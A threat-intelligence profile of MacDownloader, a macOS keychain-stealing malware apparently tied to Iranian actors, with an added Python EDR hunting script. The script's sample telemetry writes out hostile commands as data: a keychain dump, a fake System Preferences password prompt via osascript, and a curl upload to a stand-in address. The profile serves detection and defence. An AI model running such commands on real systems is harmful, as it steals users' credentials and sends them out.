MacDownloader

Malware Profile Updated 3 months ago
MacDownloader is macOS malware believed to have been created by Iranian actors and aimed specifically at the US defense industry. It was first observed in use, linked from a website impersonating the aerospace firm "United Technologies Corporation"; that site is thought to have been maintained by Iranian actors to distribute Windows malware. The site tricked visitors into downloading a fake Adobe Flash update which, depending on the detected operating system, delivered either Windows or Mac malware instead of a legitimate copy of Flash. Once the download was run, the device was infected with MacDownloader.

MacDownloader's primary function is to harvest information from the infected system, including the contents of the user's active keychains. Keychains store sensitive data such as usernames, passwords, PINs and credit card numbers. The malware also records running processes and installed applications, and captures the user's username and password through a fake System Preferences dialog. When the user clicks to "remove" the adware the tool claims to have found, MacDownloader attempts to transmit the harvested data to its command and control (C2) server.

The researchers who first documented MacDownloader, Claudio Guarnieri and Collin Anderson, note that infections typically begin with a phishing email. MacDownloader also figures in a later attribution: when Proofpoint analysed the 2023 TA453 (Charming Kitten) campaign that delivered the GorjolEcho and NokNok backdoors, it attributed that campaign to the group with high confidence based on code similarities between GorjolEcho, NokNok and malware previously attributed to the group, including GhostEcho, CharmPower and MacDownloader. MacDownloader represents a significant threat because of its ability to steal sensitive personal information and its targeted focus on the defense industry.
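The behaviour chain above (an unsigned "Flash" installer run from a user-writable location, enumeration of processes and applications, a credential prompt, a keychain read, then an upload) is what a hunt on endpoint telemetry would look for. The script below is an added example written for this page; it is not code from the profile, from the Iran Threats researchers or from Proofpoint. It assumes an EDR process-start feed already normalised into dicts with the fields shown, and every sample event, path, command line and the 203.0.113.10 (TEST-NET) address is constructed for illustration rather than taken from the real sample. The concrete command lines each behaviour is matched on (for example `osascript ... with hidden answer` for the fake System Preferences dialog) are assumptions about how such a harvester might act; the real sample may have used native dialogs and file reads that only an EDR hook would see.

```python
"""Behavioural hunt for the MacDownloader pattern described above.

Added example; not code from the page or from the researchers it cites.
Assumes an EDR feed normalised into process-start events with the fields
used below. The sample events, paths, command lines and the 203.0.113.10
(TEST-NET) address are constructed for illustration and are not indicators
recovered from the actual malware.
"""
import re
from collections import defaultdict

# Constructed sample telemetry. One lineage mimics the profile's chain
# (fake Flash installer -> host enumeration -> credential prompt ->
# keychain read -> upload); the other is a signed, benign installer.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "exe": "/usr/bin/login", "argv": ["login"], "signer": "Apple"},
    {"pid": 501, "ppid": 100, "signer": None,
     "exe": "/Users/alice/Downloads/FlashPlayer.app/Contents/MacOS/FlashPlayer",
     "argv": ["FlashPlayer"]},
    {"pid": 502, "ppid": 501, "exe": "/bin/sh", "argv": ["sh", "-c", "ps -ax"], "signer": "Apple"},
    {"pid": 503, "ppid": 501, "exe": "/bin/ls", "argv": ["ls", "/Applications"], "signer": "Apple"},
    {"pid": 504, "ppid": 501, "exe": "/usr/bin/osascript", "signer": "Apple",
     "argv": ["osascript", "-e", 'display dialog "System Preferences wants to make changes." '
                                'default answer "" with hidden answer']},
    {"pid": 505, "ppid": 501, "exe": "/usr/bin/security", "signer": "Apple",
     "argv": ["security", "dump-keychain", "-d", "/Users/alice/Library/Keychains/login.keychain-db"]},
    {"pid": 506, "ppid": 501, "exe": "/usr/bin/curl", "signer": "Apple",
     "argv": ["curl", "-X", "POST", "--data-binary", "@/tmp/k.zip", "http://203.0.113.10/upload"]},
    {"pid": 601, "ppid": 100, "signer": "Adobe Systems Incorporated",
     "exe": "/Applications/Adobe Flash Player Install Manager.app/Contents/MacOS/Install Manager",
     "argv": ["Install Manager"]},
    {"pid": 602, "ppid": 601, "exe": "/bin/ls", "argv": ["ls", "/Applications"], "signer": "Apple"},
]

USER_WRITABLE = ("/Users/", "/private/tmp/", "/tmp/", "/Volumes/")


def untrusted_flash_launcher(ev):
    """Flash-branded binary run from a user-writable path without Adobe's
    signing authority. The signer check carries the weight; the name match
    only narrows the net. Production code should key on the Team ID rather
    than the display name (assumption: the feed reports the authority name)."""
    return ("flash" in ev["exe"].lower()
            and ev["exe"].startswith(USER_WRITABLE)
            and ev["signer"] != "Adobe Systems Incorporated")


# Each behaviour from the profile mapped to an observable in the event
# stream. The concrete command lines are assumptions about how such a
# harvester might act, not strings recovered from the sample.
BEHAVIOURS = [
    ("keychain_access", lambda exe, cmd: "/Library/Keychains/" in cmd or "dump-keychain" in cmd),
    ("host_enumeration", lambda exe, cmd: re.search(r"\bps -?ax\b|system_profiler|ls /Applications", cmd) is not None),
    ("credential_prompt", lambda exe, cmd: exe.endswith("/osascript") and "hidden answer" in cmd),
    ("exfil_post", lambda exe, cmd: re.search(r"\bcurl\b.*(-X POST|--data|-d |-F )", cmd) is not None),
]


def hunt(events):
    """Attribute every matched behaviour to the nearest untrusted Flash
    launcher in its process ancestry and return one alert per launcher."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings = defaultdict(set)
    for ev in events:
        cmd = " ".join(ev["argv"])
        cur, seen = ev, set()
        while cur is not None and cur["pid"] not in seen:
            seen.add(cur["pid"])  # guard against cyclic or garbled ppid data
            if untrusted_flash_launcher(cur):
                findings[cur["pid"]].add("untrusted_flash_launcher")
                for name, match in BEHAVIOURS:
                    if match(ev["exe"], cmd):
                        findings[cur["pid"]].add(name)
                break
            cur = by_pid.get(cur["ppid"])
    alerts = []
    for pid, names in findings.items():
        # Credential theft plus an upload is the full MacDownloader chain.
        stole_creds = names & {"keychain_access", "credential_prompt"}
        severity = "high" if stole_creds and "exfil_post" in names else "medium"
        alerts.append({"pid": pid, "exe": by_pid[pid]["exe"],
                       "behaviours": sorted(names), "severity": severity})
    return sorted(alerts, key=lambda a: a["pid"])


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["severity"], alert["pid"], alert["exe"], ", ".join(alert["behaviours"]))
```

Run against the constructed feed, the unsigned launcher at pid 501 produces a single high-severity alert carrying all four follow-on behaviours, while the Adobe-signed installer that also lists /Applications produces nothing. The lineage walk matters more than any single rule: an `ls /Applications` or a `curl` POST is unremarkable on its own, and the alert only becomes credible because those actions descend from a binary that should never have been running from ~/Downloads unsigned.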
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
Name (votes): profile description

GorjolEcho (1 vote): GorjolEcho is a malicious software, or malware, linked to the Iranian group TA453 and identified by Proofpoint researchers. This sophisticated backdoor malware is designed to infiltrate computer systems, establish persistence, and exfiltrate information to command-and-control servers. The stealthy n

NokNok (1 vote): NokNok is a malicious software (malware) developed by the Iranian hacking group APT35, also known as Charming Kitten. It was discovered after the group targeted a US-based nuclear security expert with a sophisticated phishing attack. The attackers initiated several non-threatening email interactions
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Malware
Windows
Spearphishing
Iran
Proofpoint
Dropper
Phishing
Associated Malware
No associations to display
Associated Threat Actors
No associations to display
Associated Vulnerabilities
No associations to display
Source Document References
Information about the MacDownloader malware was read from the document corpus below.
Source (created): title

CERT-EU (a year ago): Iranian Cyberspies Target US-Based Think Tank With New macOS Malware
MITRE (a year ago): Mac Malware of 2017
CERT-EU (a year ago): All the Mac malware we know about